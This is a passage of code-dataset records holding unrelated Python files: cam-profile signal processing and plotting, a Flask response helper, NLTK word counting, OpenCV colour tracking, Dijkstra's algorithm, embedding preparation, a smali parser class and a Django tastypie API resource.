np.array(self.cam_profile['cam_position'][1:])[:,1]\n# lift = np.array(self.cam_profile['cam_lift'][1:])[:,1]\n# with tables.open_file('cam.tbl', 'w') as h5_file:\n# h5_file.create_array('/', 'cam_angle', angle)\n# h5_file.create_array('/', 'cam_lift', lift)\n\ndef save(file_, name, data):\n with tables.open_file(file_, 'w') as h5_file:\n h5_file.create_array('/', 'cam_recording', data)\n\ndef load(file_, name):\n with tables.open_file(file_, 'r') as h5_file:\n data = getattr(h5_file.root, name).read()\n return data\n\ndef smooth_lift(ideal_cam_lift, limit=100):\n win = signal.hann(100)\n filtered = signal.convolve(\n ideal_cam_lift,\n win,\n mode='same',\n ) / np.sum(win)\n return filtered\n\ndef fft_lift(ideal_cam_lift, limit=200):\n fft_ = np.fft.fft(ideal_cam_lift)\n fft_[int(limit):] = 0.0\n return np.fft.ifft(fft_)\n\ndef plot_S(angle, lift, projection=None):\n ax = plt.subplot(111, projection=projection)\n ax.plot(angle, lift + cam_base_radius, 'r')\n ax.plot(angle, fit_dwell_curve(cam_angle, ideal_cam_lift + cam_base_radius), 'g')\n # ax.plot(angle, fft_lift(lift, 200) + cam_base_radius, 'g')\n # ax.plot(angle, smooth_lift(lift, 100) + cam_base_radius, 'b')\n if projection == 'polar':\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n \n ax.set_rmax(max_valve_lift + cam_base_radius)\n ax.set_rmin(0.0)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef plot_FFT(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n ax.plot(angle, lift + cam_base_radius, 'r')\n\n offset = 1\n\n ax.plot(angle, fft_lift(lift, 16+offset) + cam_base_radius, 'g')\n ax.plot(angle, fft_lift(lift, 8+offset) + cam_base_radius, 'b')\n ax.plot(angle, fft_lift(lift, 4+offset) + cam_base_radius, 'xkcd:sky blue')\n ax.plot(angle, fft_lift(lift, 2+offset) + cam_base_radius, 'xkcd:beige')\n\n ax.set_rmax(max_valve_lift + cam_base_radius)\n ax.set_rmin(0.0)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef numerical_vel(angle, lift):\n x = angle\n y = lift\n dy = np.zeros(y.shape,np.float)\n dy[0:-1] = np.diff(y)/np.diff(x)\n dy[-1] = (y[-1] - y[-2])/(x[-1] - x[-2])\n return dy\n\ndef plot_V(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n ax.plot(angle, numerical_vel(angle, lift), 'r')\n ax.plot(angle, numerical_vel(fft_lift(lift)), 'g')\n ax.plot(angle, numerical_vel(smooth_lift(lift)), 'b')\n\n # ax.set_rmax(max_valve_lift)\n ax.set_rmin(min_valve_lift)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef numerical_accel(angle, lift):\n x = angle\n y = numerical_vel(angle, lift)\n dy = np.zeros(y.shape,np.float)\n dy[0:-1] = np.diff(y)/np.diff(x)\n dy[-1] = (y[-1] - y[-2])/(x[-1] - x[-2])\n return dy\n\ndef plot_A(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n ax.plot(angle, numerical_accel(angle, lift), 'r')\n ax.plot(angle, numerical_accel(fft_lift(lift)), 'g')\n ax.plot(angle, numerical_accel(smooth_lift(lift)), 'b')\n\n # ax.set_rmax(max_valve_lift)\n ax.set_rmin(0.0)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef numerical_jerk(angle, lift):\n x = angle\n y = numerical_accel(angle, lift)\n \n dy = np.zeros(y.shape,np.float)\n dy[0:-1] = np.diff(y)/np.diff(x)\n dy[-1] = (y[-1] - y[-2])/(x[-1] - x[-2])\n\n return dy\n\ndef plot_SVA(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.plot(angle, lift, 'r')\n ax.plot(angle, numerical_vel(angle, lift), 'g')\n ax.plot(angle, numerical_accel(angle, lift), 'b')\n # ax.plot(angle, numerical_jerk(angle, lift), 'xkcd:sky blue')\n \n if projection == 'polar':\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n \n ax.set_rmax(cam_base_radius + max_valve_lift * 2)\n ax.set_rmin(min_valve_lift)\n\n ax.set_rticks([\n cam_base_radius,\n 0.5 * max_valve_lift + cam_base_radius,\n max_valve_lift + cam_base_radius]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n else:\n ax.set_xlabel('Cam rotation (radians)')\n ax.set_ylim([-20, 20])\n ax.set_ylabel('SVA (cm, cm/sec, cm/sec**2)')\n ax.set_title('SVA Diagram')\n\n plt.show()\n\ndef plot_SVAJ(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.plot(angle, lift, 'r')\n ax.plot(angle, numerical_vel(angle, lift), 'g')\n ax.plot(angle, numerical_accel(angle, lift), 'b')\n ax.plot(angle, numerical_jerk(angle, lift), 'xkcd:sky blue')\n \n if projection == 'polar':\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n \n ax.set_rmax(max_valve_lift * 1.2)\n ax.set_rmin(min_valve_lift)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n else:\n ax.set_xlabel('Cam rotation (radians)')\n ax.set_ylim([-20, 20])\n ax.set_ylabel('SVAJ (cm, cm/sec, cm/sec**2, cm/sec**3)')\n ax.set_title('SVAJ Diagram')\n\n plt.show()\n\ndef fit_dwell_curve(angle, lift):\n # start at 0\n # rise\n # dwell at top\n # fall\n # dwell at bottom\n\n def rise(local_angle, total_angle, max_valve_lift):\n nondim_angle = local_angle / total_angle\n x = nondim_angle\n return max_valve_lift * (10*x**3 - 15*x**4 + 6*x**5)\n\n def __rdfd(angle, cam_offset, high_dwell_time, fall_time, low_dwell_time):\n '''\n rdfd(x, a, b, c, d)\n x is independent variable\n a -> d are parameters of the function\n '''\n\n rise_time = 2 * pi - (low_dwell_time + high_dwell_time + fall_time)\n # instead of starting at TDC the intake at the start at 0 - cam_offset\n # then rise from there for rise_time radians\n # then dwell for for high_dwell_time radians\n # then fall from there for fall_time radians\n # then complete the circle for low_dwell_time radians \n angle = angle + cam_offset\n if angle < 0:\n angle += 2 * pi\n elif angle > 2 * pi:\n angle -= 2 * pi\n\n if angle < high_dwell_time:\n return cam_base_radius + max_valve_lift\n\n elif angle < high_dwell_time + fall_time:\n local_angle = angle - (high_dwell_time)\n return cam_base_radius + max_valve_lift - rise(local_angle, fall_time, max_valve_lift)\n\n elif angle < high_dwell_time + fall_time + low_dwell_time:\n return cam_base_radius + 0.0\n\n else:\n local_angle = angle - (high_dwell_time + fall_time + low_dwell_time)\n return cam_base_radius + rise(local_angle, rise_time, max_valve_lift)\n\n _rdfd = np.vectorize(__rdfd)\n\n def rdfd(angle, cam_offset, high_dwell_time, fall_time, low_dwell_time):\n return _rdfd(angle, cam_offset, high_dwell_time, fall_time, low_dwell_time)\n\n # avoid higher order discontinuity\n # minimize difference between ideal and calculated curve\n # maximize area under the curve\n\n # xdata\n xdata = angle\n ydata = lift\n bounds = ([0, 0, pi/8, 0], [pi/2, pi, pi, pi])\n\n initial_guess = [0, pi/2, pi/2, pi/2]\n\n popt, pcov = optimize.curve_fit(rdfd, xdata, ydata, bounds=bounds)\n\n print('Optimized variables to:')\n print('Cam Advance: %.2f' % (popt[0] / pi * 180))\n print('TDwell Time: %.2f' % (popt[1] / pi * 180))\n print('Fall Time: %.2f' % (popt[2] / pi * 180))\n print('BDwell Time: %.2f' % (popt[3] / pi * 180))\n print('Rise Time: %.2f' % (360 - ((sum(popt) - popt[0]) / pi * 180)))\n\n lift = _rdfd(xdata, *popt)\n\n return lift\n\nif __name__ == '__main__':\n # note: working on this for one cam lobe at a time\n cam_angle = load('cam.tbl', 'cam_angle')[:,1]\n ideal_cam_lift = load('cam.tbl', 'cam_lift')[:,1]\n\n # plot_FFT(cam_angle, ideal_cam_lift)\n plot_SVA(\n cam_angle,\n fit_dwell_curve(cam_angle, ideal_cam_lift),\n None)\n", "sub_path": "cam_processing.py", "file_name": "cam_processing.py", "file_ext": "py", "file_size_in_byte": 9261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "tables.open_file", "line_number": 24, "usage_type": "call"}, {"api_name": "tables.open_file", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.signal.hann", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 33, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.fft.ifft", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 44, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "numpy.vectorize", "line_number": 247, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 263, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 263, "usage_type": "name"}]} +{"seq_id": "26300283", "text": "from json import dumps\nfrom flask import Response\n\nclass BaseResource(object):\n\tdef make_response(self, response, code, header=None):\n\t\tresponse = dumps(response)\n\t\tfinal_response = Response(response, status=code, mimetype='application/json')\n\n\t\tif header:\n\t\t\tfor key, value in header.items():\n\t\t\t\tfinal_response.headers[key] = value\n\n\t\treturn final_response", "sub_path": "core/resource_core.py", "file_name": "resource_core.py", "file_ext": "py", "file_size_in_byte": 358, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "537148892", "text": "import nltk\nimport codecs\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n#with open('three.txt', 'r') as f2:\nwith codecs.open('our.txt', 'r', \"utf-8-sig\") as f2:\n data = f2.read()\n print(data)\ntokens = word_tokenize(data)\ntext = nltk.Text(tokens)\n\nsr= stopwords.words('english')\nclean_tokens = tokens[:]\nfor token in tokens:\n if token in stopwords.words('english'):\n \n clean_tokens.remove(token)\nfreq = nltk.FreqDist(clean_tokens)\nfor key,val in freq.items():\n key = key.encode(\"UTF-8\", \"replace\")\n print(str(key) + ':' + str(val))\nfreq.plot(20, cumulative=False)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "codecs.open", "line_number": 6, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.Text", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 12, "usage_type": "name"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 15, "usage_type": "name"}, {"api_name": "nltk.FreqDist", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "325427267", "text": "\"\"\"\n 09. 색공간 바꾸기 및 색 추적\n\n 1. BGR 색공간을 Gray로 변경하거나, HSV로 변경하기\n 2. 비디오 프레임에서 특정한 색만 추출하여 추적하기\n\n cv2.cvtColor()\n BGR 색공간으로 생성한 Color를 HSV 값으로 전환한\n\n cv2.inRange()\n 소스인 hsv의 모든 값을 lower_blue, upper_blue로 지정한 범위에 있는지 체크한 후,\n 범위에 해당하는 부분은 그 값 그대로, 나머지 부분은 0으로 채워서 결과값을 반환합니다.\n\n\n\n OpenCV는 150가지 이상의 색공간 변경 메쏘드를 제공하고 있습니다.\n 하지만 우리는 가장 많이 사용되는 BGR - GRAY, BGR - HSV 색공간 변경 방법만\n 다루어 보도록 하겠습니다.\n\n BGR은 Blue, Green, Red 값으로 하나의 색을 결정하는 것이죠.\n HSV는 Hue(색상), Saturation(채도), Value(진하기)로 색을 결정합니다\n OpenCV에서는 Hue의 범위를 [0, 179],\n Saturation과 Value의 범위를 [0, 255]로 정의하고 있습니다.\n\n\"\"\"\n\nimport numpy as np\nimport cv2 as cv2\n\ndef hsv():\n blue = np.uint8([[[255, 0, 0]]])\n # Blue 픽셀 1개에 해당하는 numpy array를 생성합니다\n green = np.uint8([[[0, 255, 0]]])\n red = np.uint8([[[0, 0, 255]]])\n\n hsv_blue = cv2.cvtColor(blue, cv2.COLOR_BGR2HSV)\n # BGR 색공간으로 생성한 Blue를 HSV 값으로 전환한 것을 hsv_blue에 담습니다\n hsv_green = cv2.cvtColor(green, cv2.COLOR_BGR2HSV)\n hsv_red = cv2.cvtColor(red, cv2.COLOR_BGR2HSV)\n\n print('hsv for blue : ', hsv_blue)\n print('hsv for green : ', hsv_green)\n print('hsv for red : ', hsv_red)\n\n# hsv()\n# 결과\n# HSV for Blue: (120, 255, 255)\n# HSV for Green: (60, 255, 255)\n# HSV for Red: (0, 255, 255)\n\ndef tracking():\n try:\n print('카메라를 구동합니다.')\n cap = cv2.VideoCapture(0)\n except:\n print('카메라 구동실패!!')\n return\n\n while True:\n ret, frame = cap.read()\n\n # BGR을 HSV모드로 변환\n hsv1 = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # HSV에서 각 B, G, R로 정할 범위 설정\n lower_blue = np.array([110, 100, 100])\n upper_blue = np.array([130, 255, 255])\n\n lower_green = np.array([50, 100, 100])\n upper_green = np.array([70, 255, 255])\n\n lower_red = np.array([-10, 100, 100])\n upper_red = np.array([10, 255, 255])\n\n # HSV 이미지에서 각 R, G, B만 추축하기 위한 임계값\n mask_blue = cv2.inRange(hsv1, lower_blue, upper_blue)\n mask_green = cv2.inRange(hsv1, lower_green, upper_green)\n mask_red = cv2.inRange(hsv1, lower_red, upper_red)\n\n # Mask와 원본이미지를 비트 연산\n res1 = cv2.bitwise_and(frame, frame, mask = mask_blue)\n res2 = cv2.bitwise_and(frame, frame, mask = mask_green)\n res3 = cv2.bitwise_and(frame, frame, mask = mask_red)\n\n cv2.imshow('ORIGINAL', frame)\n cv2.imshow('BLUE', res1)\n cv2.imshow('GREEN', res2)\n cv2.imshow('RED', res3)\n\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\n\n cv2.destroyAllWindows()\n\ntracking()\n\n\n\n\n\n", "sub_path": "OpenCV/Change_Color.py", "file_name": "Change_Color.py", "file_ext": "py", "file_size_in_byte": 3250, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.uint8", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "481155667", "text": "import json\n\ninf = float('inf')\n\nif __name__ == '__main__':\n g = json.loads(open('input.txt').read())\n n = len(g)\n\n s = 0\n d = [inf] * n\n p = [0] * n\n\n d[s] = 0\n u = [False] * n\n\n for i in range(n):\n v = -1\n for j in range(n):\n if not u[j] and (v == -1 or d[j] < d[v]):\n v = j\n\n if d[v] == inf:\n break\n u[v] = True\n\n for j in range(len(g[v])):\n to = g[v][j][0]\n l = g[v][j][1]\n\n if d[v] + l < d[to]:\n d[to] = d[v] + l\n p[to] = v\n\n print(d)\n\n for i in range(1, n):\n v = i\n path = []\n while v != s:\n v = p[v]\n path.insert(0, v)\n\n path.append(i)\n\n print(\"Path from {} to {} : {}\".format(s, i, path))\n", "sub_path": "Passed/l6/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 819, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.loads", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "644652459", "text": "\"\"\"\nPrepare embeddings and dictionaries\n\nexport ABS_EMB=~/myfiles/vecmap/data/vecmap_output/30k.wiki.abs.src.sup.vec\nexport EXT_EMB=~/myfiles/vecmap/data/vecmap_output/30k.wiki.ext.src.sup.vec\nexport MODEL=fast_text\n\"\"\"\n\nimport pickle as pkl\nimport torch\nimport os\n\n# Insert paths\nMODEL = os.environ['MODEL']\nABS_EMB_PATH = os.environ['ABS_EMB']\nEXT_EMB_PATH = os.environ['EXT_EMB']\n\n# create abstractor DICTIONARY and and save it on disk\nvocab = {}\nfor ind, line in enumerate(open(ABS_EMB_PATH, 'r').readlines()):\n word, vec = line.split(\" \", 1)\n vocab[word] = ind\nwith open('{}/pretrained/acl/abstractor/vocab.pkl'.format(MODEL), 'wb') as fp:\n pkl.dump(vocab, fp)\n\n# save abstractor EMBEDDINGS\nweights = []\nfor line in open(ABS_EMB_PATH).readlines():\n word, vec = line.split(' ', 1)\n weights.append([float(num) for num in vec.split()])\nweights = torch.tensor(weights)\ntorch.save(weights, '{}/embeddings/abs-weights.pt'.format(MODEL))\n\n# create extractor DICTIONARY and save it on disk\nvocab = {}\nfor ind, line in enumerate(open(EXT_EMB_PATH, 'r').readlines()):\n word, vec = line.split(\" \", 1)\n vocab[word] = ind\nwith open('{}/pretrained/acl/agent_vocab.pkl'.format(MODEL), 'wb') as fp:\n pkl.dump(vocab, fp)\n\n# save extractor EMBEDDINGS\nweights = []\nfor line in open(EXT_EMB_PATH).readlines():\n word, vec = line.split(' ', 1)\n weights.append([float(num) for num in vec.split()])\nweights = torch.tensor(weights)\ntorch.save(weights, '{}/embeddings/ext-weights.pt'.format(MODEL))\n\n# inspect dictionaries\n#VOCAB = '3_models/fast_abs_rl_slo_model_weight_update_export_beams/pretrained_eng_model/agent_vocab.pkl'\n#VOCAB = '1_data/pretrained/new/agent_vocab.pkl'\n#\n#with open(VOCAB, 'rb') as fp:\n# dic = pkl.load(fp)\n# d_view = [(v, k) for k, v in dic.items()]\n# d_view.sort()\n", "sub_path": "embeddings/prepare_dictionary_and_weights_server.py", "file_name": "prepare_dictionary_and_weights_server.py", "file_ext": "py", "file_size_in_byte": 1810, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 32, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "443765457", "text": "from typing import List, Union, Type, NewType, Generic\n\nfrom smali.exceptions import FormatError\nfrom smali.statements import Statement, StatementType\n\nBlockItem = NewType('BlockItem', Union[Statement, 'Block'])\nBlockItemType = NewType('BlockItemType', Union[StatementType, 'Block[StatementType]'])\n\n\nclass Block(Generic[StatementType]):\n INDENT_SIZE = 4\n INDENT_CHAR = ' '\n\n items: List[BlockItem]\n\n def __init__(self):\n self.items = []\n\n def append(self, item: BlockItem):\n self.items.append(item)\n\n def extend(self, items: List[BlockItem]):\n self.items.extend(items)\n\n @property\n def head(self) -> StatementType:\n if isinstance(self.items[0], Statement):\n return self.items[0]\n else:\n return self.items[0].head\n\n def flatten(self) -> List[Statement]:\n result = []\n for item in self.items:\n if isinstance(item, Statement):\n result.append(item)\n elif isinstance(item, Block):\n result.extend(item.flatten())\n else:\n raise FormatError(f'invalid item type: {type(item)}')\n return result\n\n @staticmethod\n def _match_item(item: Statement, **attributes) -> bool:\n for key, value in attributes.items():\n if not hasattr(item, key):\n return False\n if getattr(item, key) != value:\n return False\n return True\n\n def find(self, stmt_type: Type[StatementType], **kwargs) -> List[BlockItemType]:\n result = []\n for item in self.items:\n if isinstance(item, Block):\n if isinstance(item.head, stmt_type) and Block._match_item(item.head, **kwargs):\n result.append(item)\n else:\n result.extend(item.find(stmt_type, **kwargs))\n elif isinstance(item, stmt_type) and Block._match_item(item, **kwargs):\n result.append(item)\n return result\n", "sub_path": "smali/block.py", "file_name": "block.py", "file_ext": "py", "file_size_in_byte": 1998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.NewType", "line_number": 6, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 6, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.NewType", "line_number": 7, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 7, "usage_type": "name"}, {"api_name": "smali.statements.StatementType", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 10, "usage_type": "name"}, {"api_name": "smali.statements.StatementType", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 27, "usage_type": "argument"}, {"api_name": "smali.statements.StatementType", "line_number": 26, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 35, "usage_type": "argument"}, {"api_name": "smali.exceptions.FormatError", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 32, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 52, "usage_type": "name"}, {"api_name": "smali.statements.StatementType", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "463747361", "text": "# -*- coding: utf-8 -*-\nimport json\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom tastypie.paginator import Paginator\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom tastypie.serializers import Serializer\nfrom tastypie.validation import FormValidation\nfrom tastypie.exceptions import NotFound\nfrom tastypie.authentication import Authentication, SessionAuthentication\nfrom tastypie.authorization import Authorization\nfrom tastypie import fields\nfrom client.models import Tag\nfrom deal.models import Deal, DealItem\nfrom deal.forms import DealForm\nfrom deal.authorization import DealAuthorization, DealItemAuthorization\nfrom note.models import Note\nfrom backend_log.logging_handler import ModelResourceProxy as ModelResource\n\n\nclass DealResource(ModelResource):\n client = fields.ForeignKey('client.api.ClientResource', 'client', full=False, null=True)\n case = fields.ForeignKey('client.api.CaseResource', 'case', full=False, null=True)\n user = fields.ForeignKey('account.api.UserResource', 'user', full=False, null=True)\n\n class Meta:\n response_name = 'deal'\n queryset = Deal.active.all()\n fields = ['id', 'client', 'case', 'user', 'name', 'price', 'description',\n 'status', 'is_active', 'created', 'creator_ip', 'tag']\n filtering = {\n \"id\": ALL,\n 'is_active': ALL,\n 'created': ALL,\n 'name': ALL,\n 'price': ALL,\n 'status': ALL,\n 'client': ALL_WITH_RELATIONS,\n 'case': ALL_WITH_RELATIONS,\n }\n authorization = DealAuthorization()\n authentication = SessionAuthentication()\n validation = FormValidation(form_class=DealForm)\n serializer = Serializer(formats=['json', 'jsonp'])\n paginator_class = Paginator\n list_allowed_methods = ['get', 'post', 'put']\n detail_allowed_methods = ['get', 'post', 'put']\n ordering = ['id', 'name', 'price', 'status']\n always_return_data = True\n\n def hydrate(self, bundle):\n tag_list = bundle.data.get('tag_list', None)\n if tag_list:\n bundle.obj.tag = Tag.objects.filter(id__in=tag_list)\n return super(DealResource, self).hydrate(bundle)\n\n def dehydrate(self, bundle):\n bundle.data['pre_sale'] = {\"id\": bundle.obj.case.user.id, \"name\": bundle.obj.case.user.username}\n bundle.data['sell'] = {\"id\": bundle.obj.user.id, \"name\": bundle.obj.user.username}\n ticket_set = bundle.obj.ticket_set.filter(is_active=True)\n if ticket_set.exists() and ticket_set[0].assignee:\n bundle.data['after_sale'] = {\"id\": ticket_set[0].assignee.id, \"name\": ticket_set[0].assignee.username}\n\n bundle.data['username'] = bundle.obj.user.name\n bundle.data['case_name'] = bundle.obj.case\n bundle.data['case_id'] = bundle.obj.case.id\n 